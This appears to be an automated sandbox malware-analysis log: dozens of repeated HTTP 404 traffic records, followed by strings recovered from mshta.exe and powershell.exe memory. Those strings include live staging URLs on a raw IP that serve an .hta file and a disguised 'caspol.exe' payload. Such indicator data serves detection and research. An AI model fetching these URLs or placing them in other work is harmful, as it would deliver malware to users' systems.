                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:57:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 06:58:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/
                    Source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/55/caspol.e
                    Source: powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/55/caspol.exe
                    Source: powershell.exe, 0000001F.00000002.523691740.000000001AF69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/55/caspol.exe6
                    Source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/55/caspol.exep
                    Source: mshta.exe, 00000004.00000002.432158239.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431264903.00000000034DD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432134757.00000000042AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431156487.00000000042AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506803305.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.507346149.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.0000000000279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506294361.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.504008484.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512306912.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.507364961.0000000002C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
                    Source: mshta.exe, 0000001D.00000002.511914905.00000000001DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta$1
                    Source: mshta.exe, 00000004.00000003.430428593.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430640416.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430980490.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.431523218.00000000004C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.000000000022C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta..
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta38
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta=8
                    Source: mshta.exe, 00000004.00000002.432158239.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430626132.0000000004301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.511914905.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506346159.0000000000240000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506294361.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.504008484.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512306912.0000000003D87000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510915090.0000000000240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaC:
                    Source: mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaHf
                    Source: mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaV8
                    Source: mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaZf
                    Source: mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htadf
                    Source: mshta.exe, 00000004.00000003.431264903.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.510361814.0000000002C25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.506573800.0000000002C25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaht
                    Source: mshta.exe, 0000001D.00000002.512238267.0000000003CBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511231809.0000000003CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htavf
                    Source: mshta.exe, 00000004.00000003.430626132.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432158239.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000002.512257689.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.508040441.0000000003CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001D.00000003.511689770.0000000003CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
